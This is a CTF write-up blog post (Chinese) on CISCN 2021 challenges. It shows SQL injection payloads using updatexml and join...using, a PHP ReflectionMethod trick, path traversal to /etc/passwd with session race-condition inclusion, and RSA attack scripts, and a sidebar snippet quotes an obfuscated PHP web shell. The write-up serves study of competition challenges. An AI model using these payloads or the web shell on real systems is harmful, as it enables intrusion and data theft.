CISCN2021_华南初赛_记录

最新推荐文章于 2024-05-20 22:22:59 发布
最新推荐文章于 2024-05-20 22:22:59 发布
阅读量1.1k 收藏 2
点赞数
分类专栏: 比赛
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45882317/article/details/116899049
版权

easy_sql

hint:一个简单的sql注入题目

打开一个登录框,随便测试下,发现报错了

直接报错注入Payload打一波

失败,回显no,开始跑字典

过滤了 column和可以获取表名的表

如:

在这里插入图片描述

尝试盲猜表名【后面发现sqlmap爆破表名也可以跑出来】

最后成功两个 users,flag

有了表名,接下来就是无列名注入了

发现过滤了 union

尝试使用join…using()注

uname=1') and (updatexml(1,concat(0x7e,(select * from (select * from users as a join users as b)as c),0x7e),1))#&passwd=1&Submit=%E7%99%BB%E5%BD%

Duplicate column name ‘id’

uname=1') and (updatexml(1,concat(0x7e,(select * from (select * from users as a join users as b using(id))as c),0x7e),1))#&passwd=1&Submit=%E7%99%BB%E5%BD%

Duplicate column name ‘username’

uname=1') and (updatexml(1,concat(0x7e,(select * from (select * from users as a join users as b using(id,username))as c),0x7e),1))#&passwd=1&Submit=%E7%99%BB%E5%BD%

Duplicate column name ‘password’

uname=1') and (updatexml(1,concat(0x7e,(select * from (select * from users as a join users as b using(id,username,password))as c),0x7e),1))#&passwd=1&Submit=%E7%99%BB%E5%BD%

Operand should contain 1 column(s)

uname=1') and (updatexml(1,concat(0x7e,(select concat(id,username,password) from (select * from flag as a join flag as b using(id))as c),0x7e),1))#&passwd=1&Submit=%E7%99%BB%E5%BD%

Duplicate column name ‘no’

uname=1') and (updatexml(1,concat(0x7e,(select concat(id,username,password) from (select * from flag as a join flag as b using(id,no))as c),0x7e),1))#&passwd=1&Submit=%E7%99%BB%E5%BD%

Duplicate column name ‘e41f1cd3-24e3-48b9-b98a-50526ecffcd6’

uname=1') and (updatexml(1,concat(0x7e,(select * from (select * from flag as a join flag as b using(id,no,`e41f1cd3-24e3-48b9-b98a-50526ecffcd6`))as c),0x7e),1))#&passwd=1&Submit=%E7%99%BB%E5%BD%

Operand should contain 1 column(s)

所有列名都出来了,直接查就可以了

Payload:

uname=1') and (updatexml(1,concat(0x7e,mid((select `e41f1cd3-24e3-48b9-b98a-50526ecffcd6` from flag),1),0x7e),1))#&passwd=1&Submit=%E7%99%BB%E5%BD%

uname=1') and (updatexml(1,concat(0x7e,mid((select `e41f1cd3-24e3-48b9-b98a-50526ecffcd6` from flag),20),0x7e),1))#&passwd=1&Submit=%E7%99%BB%E5%BD%

easy_source

hint:题目描述:你知道开发一个php程序很重要的东西是什么吗(flag在你看不到的地方)

打开500,题目源代码,扫描源代码

.index.php.swo

本题目没有其他代码了噢,就只有这一个文件,虽然你看到的不完全,但是你觉得我会把flag藏在哪里呢,仔细想想文件里面还有什么?
<?php
class User
{
    private static $c = 0;

    function a()
    {
        return ++self::$c;
    }

    function b()
    {
        return ++self::$c;
    }

    function c()
    {
        return ++self::$c;
    }

    function d()
    {
        return ++self::$c;
    }

    function e()
    {
        return ++self::$c;
    }

    function f()
    {
        return ++self::$c;
    }

    function g()
    {
        return ++self::$c;
    }

    function h()
    {
        return ++self::$c;
    }

    function i()
    {
        return ++self::$c;
    }

    function j()
    {
        return ++self::$c;
    }

    function k()
    {
        return ++self::$c;
    }

    function l()
    {
        return ++self::$c;
    }

    function m()
    {
        return ++self::$c;
    }

    function n()
    {
        return ++self::$c;
    }

    function o()
    {
        return ++self::$c;
    }

    function p()
    {
        return ++self::$c;
    }

    function q()
    {
        return ++self::$c;
    }

    function r()
    {
        return ++self::$c;
    }

    function s()
    {
        return ++self::$c;
    }

    function t()
    {
        return ++self::$c;
    }
    
}

$rc=$_GET["rc"];
$rb=$_GET["rb"];
$ra=$_GET["ra"];
$rd=$_GET["rd"];
$method= new $rc($ra, $rb);
var_dump($method->$rd());

审计代码,发现可以实例化任意类,并调用其方法,user类中有很多方法,但似乎没有用

尝试反序列化各种php内置类

最后尝试 ReflectionMethodUser 类中的注释

?rc=ReflectionMethod&ra=User&rd=getDocComment&rb=a,rb=a时回显注释,猜测可行,直接bp爆破

q成功

在这里插入图片描述

middle_source

<?php
    highlight_file(__FILE__);
    echo "your flag is in some file in /etc ";
    $fielf=$_POST["field"];
    #$cf="/tmp/app_auth/cfile/".$_POST['cf'];
    $cf=$_POST['cf'];
    
    if(file_exists($cf)){
        include $cf;
        echo $$field;
        exit;
    }
    else{
        echo " ";
        exit;
    }

进去一个文件包含,文件名前面有前缀,无过滤可以 ../到达根目录

尝试 ../../../..//etc/passwd 成功

看到 $$field,尝试 GLOBALS,但无回显,最后发现这是烟雾弹,这个变量名未赋值,佛了

尝试包含各种常见的配置文件,跑了各种字典,无果

最后队友说有 .listing

发现 you_can_seeeeeeee_me.php,是个phpinfo,这就好办了啊!!!

大致浏览的phpinfo,发现很多危险函数被禁用

在session文件存储路径下,发现特殊乱序字符加在默认路径下,一看就是预期解,直接Session—条件竞争,后面就是常见的session条件竞争文件包含了

只不过,因为被禁用了函数,正常的写马无效了,突然想到这里提示了flag在 /etc下,那么我可以读文件目录,最后再包含即可

直接 scandir(),然后包含

web后面太菜了,没打下来

赛后看wp,发现可以copy('/var/lib/php/sessions/bajddbh
fcd/sess_%s','/tmp/s.php');学到了,这样就可以减少文件上传的时间了

RSA

简单的RSA

from flag import text,flag
import md5
from Crypto.Util.number import long_to_bytes,bytes_to_long,getPrime

assert md5.new(text).hexdigest() == flag[6:-1]

msg1 = text[:xx]
msg2 = text[xx:yy]
msg3 = text[yy:]

msg1 = bytes_to_long(msg1)
msg2 = bytes_to_long(msg2)
msg3 = bytes_to_long(msg3)

p1 = getPrime(512)
q1 = getPrime(512)
N1 = p1*q1
e1 = 3
print pow(msg1,e1,N1)
print (e1,N1)

p2 = getPrime(512)
q2 = getPrime(512)
N2 = p2*q2
e2 = 17
e3 = 65537
print pow(msg2,e2,N2)
print pow(msg2,e3,N2)
print (e2,N2)
print (e3,N2)

p3 = getPrime(512)
q3 = getPrime(512)
N3 = p3*q3
print pow(msg3,e3,N3)
print (e3,N3)
print p3>>200

审计代码,分三片

第一片

e1 = 3 ,低加密指数广播攻击

#!py -2
#coding:utf-8
# python2
# e=3时,爆破密文

import gmpy2

#破解密文
n = 123814470394550598363280518848914546938137731026777975885846733672494493975703069760053867471836249473290828799962586855892685902902050630018312939010564945676699712246249820341712155938398068732866646422826619477180434858148938235662092482058999079105450136181685141895955574548671667320167741641072330259009
e = 3
cipher = 19105765285510667553313898813498220212421177527647187802549913914263968945493144633390670605116251064550364704789358830072133349108808799075021540479815182657667763617178044110939458834654922540704196330451979349353031578518479199454480458137984734402248011464467312753683234543319955893

def get_flag():
    i = 0
    while True:
        if(gmpy2.iroot(cipher+i*n, 3)[1] == True):
            flag_bin = int(gmpy2.iroot(cipher+i*n, 3)[0])
            flag = hex(flag_bin)[2:-1].decode("hex")
            print('hex:'+hex(flag_bin)[2:-1])
            print(flag)
            break
        i += 1


if __name__ == "__main__":
    get_flag()

第二片,共模攻击

# 共模攻击
import sys
import binascii
sys.setrecursionlimit(1000000)
def egcd(a, b):
    if a == 0:
      return (b, 0, 1)
    else:
      g, y, x = egcd(b % a, a)
      return (g, x - (b // a) * y, y)
def modinv(a, m):
    g, x, y = egcd(a, m)
    if g != 1:
      raise Exception('modular inverse does not exist')
    else:
      return x % m

c1=54995751387258798791895413216172284653407054079765769704170763023830130981480272943338445245689293729308200574217959018462512790523622252479258419498858307898118907076773470253533344877959508766285730509067829684427375759345623701605997067135659404296663877453758701010726561824951602615501078818914410959610
#n=0xc42b9d872f8ecf90b4832199771bbd8d9bafb213747d905a644baa42144f316dc224e7914f8a5d361eeab930adf5ea7fbe1416e58b3fae34ca7e6d2a3145e04af02cf5a4f14539fff032bccd7bb9cf85b12d7d36dbc870b57e11aa5704304d08eff685fe4ccd707e308dfac6a1167d79199ffa9396c4f2efb4770256253d1407
n = 111381961169589927896512557754289420474877632607334685306667977794938824018345795836303161492076539375959731633270626091498843936401996648820451019811592594528673182109109991384472979198906744569181673282663323892346854520052840694924830064546269187849702880332522636682366270177489467478933966884097824069977
#e1=0xc21000af014a98b2455dec479
e1 = 17
#c2=0xc4053ed3455c15174e5699ab6eb09b830a98b79e92e7518b713e828faca4d6d02306a65a8ec70893ca8a56943a7074e6de8649f099164cad33b8ca93fce1656f0712b990cce06642250c52a80d19c2afa94a4e158139028ac89c811e6be8d7b6984b6c1edcdd752e4955e3a6f1ab38cf2edb4474a80e03d6c313eb8ebf4e98cc
c2 = 91290935267458356541959327381220067466104890455391103989639822855753797805354139741959957951983943146108552762756444475545250343766798220348240377590112854890482375744876016191773471853704014735936608436210153669829454288199838827646402742554134017280213707222338496271289894681312606239512924842845268366950
#e2=0x9935842d63b75899ddd81b467
e2 = 65537

s = egcd(e1, e2)
s1 = s[1]
s2 = s[2]

if s1<0:
   s1 = - s1
   c1 = modinv(c1, n)
elif s2<0:
   s2 = - s2
   c2 = modinv(c2, n)
m=(pow(c1,s1,n)*pow(c2,s2,n)) % n
print('10:'+str(m))
print('hex:'+hex(m))
print (binascii.unhexlify(hex(m)[2:].strip("L")))

第三片,已知p的高位,Factoring with High Bits Known

Sage Cell Server (sagemath.org)

#sage

#p4已知高位
p4 = 7117286695925472918001071846973900342640107770214858928188419765628151478620236042882657992902
n = 113432930155033263769270712825121761080813952100666693606866355917116416984149165507231925180593860836255402950358327422447359200689537217528547623691586008952619063846801829802637448874451228957635707553980210685985215887107300416969549087293746310593988908287181025770739538992559714587375763131132963783147

#全位数
pbits = 512

#缺省位数
kbits = pbits - p4.nbits()#nbits()位数
print (p4.nbits())
p4 = p4 << kbits
PR.<x> = PolynomialRing(Zmod(n))

f = x + p4
x0 = f.small_roots(X=2^kbits, beta=0.4)[0]
print ("x:" ,hex(int(x0)))
p = p4+x0
print ("p: ", hex(int(p)))
assert n % p == 0
q = n/int(p)
print ("q: ", hex(int(q)))

得到pq,直接解密文

#!py -2
import gmpy2
n=113432930155033263769270712825121761080813952100666693606866355917116416984149165507231925180593860836255402950358327422447359200689537217528547623691586008952619063846801829802637448874451228957635707553980210685985215887107300416969549087293746310593988908287181025770739538992559714587375763131132963783147
p = 11437038763581010263116493983733546014403343859218003707512796706928880848035239990740428334091106443982769386517753703890002478698418549777553268906496423
q = n/p
e = 65537
c=59213696442373765895948702611659756779813897653022080905635545636905434038306468935283962686059037461940227618715695875589055593696352594630107082714757036815875497138523738695066811985036315624927897081153190329636864005133757096991035607918106529151451834369442313673849563635248465014289409374291381429646
a=gmpy2.invert(e, (p-1)*(q-1))
print (a)
m= pow(c,a,n)
print (m)
print(hex(m))

比较菜的人是我,跑出了明文,但,提交不了flag,因为这些字符串中带有的空格和换行的锅,下次遇到直接 转16进制再md5

from hashlib import md5
print(md5(hex(m).encode('utf8')).hexdigest())
ScyLamb
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
[CISCN 2021 华南赛区]rsa Writeup
bestkasscn的博客
05-16 781
[CISCN 2021 华南赛区]rsa 题目描述 from flag import text,flag import md5 from Crypto.Util.number import long_to_bytes,bytes_to_long,getPrime assert md5.new(text).hexdigest() == flag[6:-1] msg1 = text[:xx] msg2 = text[xx:yy] msg3 = text[yy:] msg1 = bytes_to_long(
2021[CISCN]write-up
weixin_44345014的博客
05-16 457
2021[CISCN]write-up 一、crypto 1、rsa from flag import text,flag import md5 from Crypto.Util.number import long_to_bytes,bytes_to_long,getPrime assert md5.new(text).hexdigest() == flag[6:-1] msg1 = text[:xx] msg2 = text[xx:yy] msg3 = text[yy:] msg1 = bytes
CISCN初赛wp misc,re,pwn,web,crypto
最新发布
fivesheeptree的博客
05-20 815
CISCN初赛wp misc,re,pwn,web,crypto
[CISCN 2021初赛]隔空传话
qq_47875210的博客
11-14 488
这个地方不太会的可以去看我之前的博文,链接:https://blog.csdn.net/qq_47875210/article/details/126171502?的内容下载到运行脚本的位置!(弄好PyExecJS),w465也就是width=465的意思了。:看看你能从这些数据里发现什么?注意事项:使用的我的代码时候,务必要把。宽度:465,高度:63,这也对应了。所以我们得到了第一段flag为。,因为需要调用dpu.js。水平翻转再垂直翻转就好了。
2021全国大学生信息安全大赛[CISCN]web部分复现
1ance's blog
05-18 1441
目录Webeasysqleasy_source Web easysql 太菜了。。一道注入搞了半天也没整出来离谱的很。。 先是想着sqlmap跑一下,结果发现是sqllabs的数据库,发现flag表,心中暗想不会吧不会吧这就出来了??接下去,才发现是我太年轻了。flag表里啥就一个id字段,其他的啥也没跑出来,离谱啊。。 只能手工测测了。发现有报错注入,但是information被过滤了,查不了列名,然后想着用时间盲注,跑出列名,最后跑出来flag(那一刻是超爽)。。。。但是提交错误(心态炸裂),然后开始检
2021-CISCN-初赛 总结
Chmaz的博客
05-21 1000
第一次打ctf比赛,之前也没怎么做过题,果然被虐惨了,全队一个题也没做出来. 选择 几乎都看不懂,目前大一,专业知识几乎还未涉猎,还好是开卷,拿了625分. 杂项 Running_pixel 题目给了一个gif图 比赛时候想了很久,唯一能着手的点就是发现,gif每10帧图片会变色,但是就此思路就断了,怎么处理也没有什么思路. 其实当时一度离正确思路非常近, 当时我在第十帧经过处理后发现一个奇妙的点点.但是当时并没有多想. 结果正确思路就是把每十帧的图片对比每位像素,合在一张图上得到这样的图片,按顺序.
EIGRP.rar_cisco documentation_eigrp
09-14
cisco网络IGP实验:EIGRP综合实验的技术文档,包括拓扑和具体的配置
Net.rar_思科_思科 仿真
09-19
1. **思科交换机仿真器**:在实际环境中设置和测试网络设备可能会带来成本和风险,因此,思科提供了多种仿真工具,如Cisco Packet Tracer和Cisco IOS on Linux (IOU)等,使用户能够在虚拟环境中模拟真实的网络环境。...
Cisco_IOS_.rar_Cisco_IOS_
09-14
1. **日志记录**:`logging host 192.168.1.3`配置日志服务器,`logging trap debug`设置日志级别为调试。 2. **ping与traceroute**:`ping 192.168.2.1`检查到目标的连通性,`traceroute 192.168.2.1`追踪路由。 *...
CCM.zip_cisco call manager _phone
09-23
5. **呼叫记录**:CCM可以跟踪和记录通话,为企业提供通话数据报告和分析。 6. **安全性**:通过端到端加密和身份验证机制,CCM保护语音通信免受恶意攻击。 7. **可扩展性**:CCM支持从小型企业到大型企业的无缝扩展...
mib.zip_mib_mib snmp cisco_mib 思科_oid_思科MIB文件
09-21
《思科MIB文件与SNMP管理:理解与应用》 在IT网络管理领域,Cisco MIB(Management Information Base)文件和SNMP(Simple Network Management Protocol)是两个至关重要的概念。MIB文件是网络设备配置和状态信息的...
2021ciscn初赛web部分简单wp
weixin_45805993的博客
05-24 426
0x00. 简单的题不想写wp,难的题写不出来……这篇博客应该会比较水,不喜勿喷 0x01.easy_source Payload http://xxxxxxxxxx/index.php?rc=splFileobject&ra=.index.php.swo&ra=php://filter/read=convert.base64-encode/resource=index.php&rb=rb&rd=fgets 挺简单的,不细说了 用php原生类splFileObject,用ge
记录复现一下第一次awd
qq_63928796的博客
02-09 577
之前没打过awd,这次学长组织了一场awd娱乐赛,两个web一个pwn,还有一个黑盒,只会web,第一次啥也不会瞎打,被打烂了,不会写脚本,手交flag的感觉真“不错”,感觉awd还是比ctf好多了(虽然啥也不会),浅浅复现一下。
一次AWD比赛记录
luoluopeach
10-10 490
BEGIN ssh -p 2201 ctf@118.89.227.105 备份文件以后,首先D盾扫一波 使用defence上waf 开始修洞 .config_common.php 这是一个已知后门 <?php error_reporting(0);set_time_limit(0);$a=base64_decode("Y"."X"."N"."z"."Z"."X"."J"."0");$a(@${"_P"."O"."S"."T"}[520]); ?> base64_decode:YXN
ciscn 华中赛区分区赛 awd pwn2
yongbaoii的博客
07-15 456
libc 2.27 record 结构还是比较清晰的。 申请了一个大小为0x110的chunk。前0x10是mark,后0x100是msg。 在最后八个字节那里,维护了一个单链表。 scrape 也就是删除,但是在删除链表尾的时候有uaf。 browser 就是输出,上面花里胡哨的也没啥用,然后有个格式化字符串漏洞。 rewrite 可以重新写一下。 backdoor 也是在做一个输出。 漏洞有俩,一个格式化字符串,一个uaf。 uaf利用半天利用不出来,格式化字符串倒是简单。 exp from p.
第15届全国大学生知识竞赛场景实操 2022ciscn线上初赛 部分writeup
Nancy523的博客
05-29 2719
文章目录ez_usbeverlasting_night问卷调查签到电台Ezpop**基于挑战码的双向认证1、2**基于挑战码的双向认证3Iso9798Login-nomalBaby-tree ez_usb 拿到附件wireshark打开 观察 发现流量中存在两种arr 过滤 usb.addr == “2.8.1” && usbhid.data跟usb.addr == “2.10.1” && usbhid.data 分别导出为csv文件 提取hid data 梭哈脚本,
2021CISCN初赛re
寻梦&之璐
05-23 6275
文章目录baby.bc.bc转换为可执行程序fill_number(__int64)input)docheck(input, input):z3约束 baby.bc .bc转换为可执行程序 第一次拿到.bc的文件 查了一下,LLVM IR bitcode,二进制文件。想办法转换成.s,然后再转成可执行文件。(windows里面无法转成elf,最后编译成elf时,需要在linux里面进行 fill_number(__int64)input) docheck(input, input):z3约束 ..
[CISCN2021] 初赛 easy_source
fightte的博客
05-21 485
[CISCN2021] 初赛 easy_source 国赛,很有经历和意义,希望继续挑战 国赛和大家做的一道题,国赛比较难,只有现在有时间回过去看看: 进去后,界面大概如上图, 提示如上图: 猜测备份文件,实际上当时没扫描出来,试了.svn .swp .swo等,后来别个提示才发现: 实际上前面要加一个点,也就是.index.php.swo 现在看来应该去考虑php的原生类反序列化,是一个典型题目: 使用[反射类]new ReflectionClass("类名"),获得这个类的信息 参考:http
linux命令
sdaujsj1的博客
03-20 438
cd usr //进入该文件夹内 mkdir xiepanpan//创建xiepanpan文件夹 pwd //显示所在的路径位置 echo Hello &amp;amp;gt;file1 //把echo 后的内容输入文件file1中,大于号表示输出,若文件存在直接输入到文件中,不存在 先创建文件再输入到文件中 echo world! &amp;amp;gt;file2 //同上 把world...
地址池命令 思科理由_Cisco net动态地址池转换
05-29
您的问题是关于思科路由器的动态地址池转换命令。以下是一个示例命令: ip dhcp pool pool-name network network-id subnet-mask default-router default-gateway dns-server dns-server-address 其中,pool-name是地址池的名称,network-id和subnet-mask是DHCP服务器提供的IP地址子网,default-gateway是默认网关的IP地址,dns-server-address是DNS服务器的IP地址。这些命令将为连接到路由器的设备分配动态IP地址。您可以根据需要添加其他参数和选项。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值